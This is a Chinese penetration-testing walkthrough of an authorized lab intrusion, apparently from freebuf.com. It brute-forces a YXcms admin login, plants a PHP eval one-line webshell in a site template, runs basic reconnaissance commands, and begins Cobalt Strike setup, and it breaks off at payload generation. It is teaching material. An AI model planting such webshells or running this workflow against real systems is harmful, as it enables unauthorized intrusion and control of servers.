渗透测试之地基内网篇：域森林中实战攻防（上）

渗透测试之地基内网篇：域森林中实战攻防（上） – 作者:dayuxiyou

系列文章

专辑：渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基，加强每日训练操作的笔记，在记录地基笔记中会有很多跳跃性思维的操作和方式方法，望大家能共同加油学到东西。

请注意：

本文仅用于技术讨论与研究，对于所有笔记中复现的这些终端或者服务器，都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，本站及作者概不负责。

名言：

你对这行的兴趣，决定你在这行的成就！

一、前言

渗透测试人员需谨记《网络安全法》，根据《网络安全法》所示，未经授权的渗透测试都是不合法的，不管是出于何种目的。红队渗透人员在进行渗透期间，渗透测试的行为和项目必须在被渗透方授予权限可渗透后，才可进行渗透测试操作。

如今有一家dayu公司，需要对自己的业务以及整体的内网框架体系进行隐患挖掘，授予权限我进行对dayu公司的渗透测试操作，在签署了双方的《渗透测试授权书》后，我开始了对dayu公司的渗透之旅。

跳开思维讲，我此篇内容是内网渗透篇章，通过我的专栏：

社工钓鱼 -> 免杀过全杀软 -> 内网渗透

那么我通过了社工钓鱼的各种方式，将钓鱼文件进行免杀后，成功钓鱼到了该公司外围人员计算机，并控制了该计算机权限获得shell，并成功登录对方电脑。

通过前期对域用户大量的信息收集，画出了相对应的简单网络拓扑图，下一步需要进攻子域控制器，思路如下：

域普通用户 -> 子域控制器 -> 父域控制器 -> 辅域控制器 -> 财务独立域 -> 涉密系统

通过该思路进攻即可，还有另外一条思路：

域普通用户 -> 10.10.21.0/24二级区域 -> 父子域控制器 -> 横向延伸（财务独立域10.10.21.0/24）

渗透人员最爱系统之一有kali，还有各类windows集成的武器库系统，通过前几期的域森林专辑文章中利用隐藏通道技术、权限提升、横向攻击、域控安全技术、跨域攻击、置零攻击等手段对公司进行了大面积渗透行为，今天我们就来对域森林中进行实战攻防演练，利用前期学到的方法在内网中遨游！

二、环境介绍

目前信息收集获得的网络情况：（模拟环境）
拓扑图简介
1625026963_60dbf193ce42006710f4d.png!small?1625026964284 为了更好的演示接下来的渗透和回看总拓扑图公司搭建环境情况：

单篇：渗透测试之地基内网篇：域森林中父子域和辅域用户搭建分析

实战是结合所有知识思路的集合体，只有实战才能检验能力的时刻，也只有实战才能更快的进步和检验错误，接下来将介绍如何一步步攻破内网域森林环境！

三、攻击Web服务器

在互联网发现一个web页面地址如下：

www.dayugs.com

开始进行授权攻击行为！

1、web登录注册点

1）发现登录注册选项：
1625026971_60dbf19b50adae21652e5.png!small?1625026978921 右上角发现登录注册框！

2）尝试点击登录和注册：
1625026974_60dbf19ed2861188780cf.png!small?1625026984340 该页面经过简单尝试未发现账号和密码

3）获得管理后台：
1625026980_60dbf1a4178e80085faf4.png!small?1625026985572 通过简单的手动测试，发现管理登录后台：

1625026983_60dbf1a7e6b31eafdcf29.png!small?1625026985572 后台地址：

http://www.dayugs.com/index.php?r=admin/index/login

开始进行YXcms的web渗透！

2、爆破用户名密码

1）利用Burpsuite抓包分析：
1625026992_60dbf1b0c035f0843f10b.png!small?1625026993967

2）burpsuit拦截请求：
1625026997_60dbf1b54cb46ea9533a3.png!small?1625026998468

3）BurpSuite进行爆破：
1625027001_60dbf1b9d084b92c7c80d.png!small?1625027003588

4）导入字典：
1625027006_60dbf1be60f04b75e5ee3.png!small?1625027007789

5）获取密码：
1625027011_60dbf1c30d5105e2984a1.png!small?1625027012169 通过爆破获得用户密码：admin/123456

6）成功登录到后台：

1625027015_60dbf1c7ba5f277b86a5f.png!small?1625027016187

1625027022_60dbf1ce0ce3e9abfe233.png!small?1625027028575

版本：YxcmsApp 1.2.1 【未授权】获取授权版. （版本较低）

3、获取webshell

1）前台模板拿shell：
1625027026_60dbf1d28d06a576c9f11.png!small?1625027028576 左边选择前台模板->管理模板文件

2）管理模板文件-index_index.php：
1625027031_60dbf1d77418048507026.png!small?1625027042201 选择index_index.php

3）写入一句话：
1625027036_60dbf1dc874cbe7b59be3.png!small?1625027042202 顶端写入一句话到主页！

<?php @eval($_POST[123]);?>

4）保存：
1625027040_60dbf1e076001d8120284.png!small?1625027042200 成功保存！

5）蚁剑测试：
1625027046_60dbf1e691a0314391aef.png!small?1625027048033

URL地址：http://www.dayugs.com/index.php
链接密码：123

通过点击测试连接，回显连接成功。

6）成功登录：
1625027050_60dbf1ea531721cf6d6fa.png!small?1625027051209 点击添加后，成功获取webshell，双击后进入webshell界面。

7）在此处打开终端：
1625027054_60dbf1eeedf774456e1ee.png!small?1625027056431 可看到通过简单的交互，获得终端普通用户控制权！

4、简单内网信息收集

1）简单信息收集
1625027059_60dbf1f3aeb72b6dc1968.png!small?1625027060461

hostname
whoami
arp -a

user/dayu
10.10.3.6

2）查看进程：
1625027064_60dbf1f87e531f030bbd3.png!small?1625027065546

tasklist

进程中查看是否存在杀软

3）检查是杀软：
1625027070_60dbf1feed92e575b4aec.png!small?1625027072978 https://www.ddosi.com/av/1.php
无杀软！！

四、CobaltStrike后渗透

1）VPS开启teamserver
1625027075_60dbf2036d989adab78bb.png!small?1625027076399

teamserver 192.168.253.38 11111

2）运行CS：
1625027080_60dbf208090a924c1e0b8.png!small?1625027082131 填写VPS主机IP、端口、默认用户名、和TEM设置的密码！

3）建立监听：

1625027085_60dbf20d4ab97d1f70cd0.png!small?1625027088075 进来后需要建立监听：填写名字、HTTP-payload、HTTP-host，HTTP-port，最后点击save！

4）CS生成payload：

1625027090_60dbf212230ce00ee3989.png!small?16250

来源：freebuf.com 2021-06-30 12:22:08 by: dayuxiyou

文章版权归作者所有，未经允许请勿转载。

THE END

安全网站文章

喜欢就支持一下吧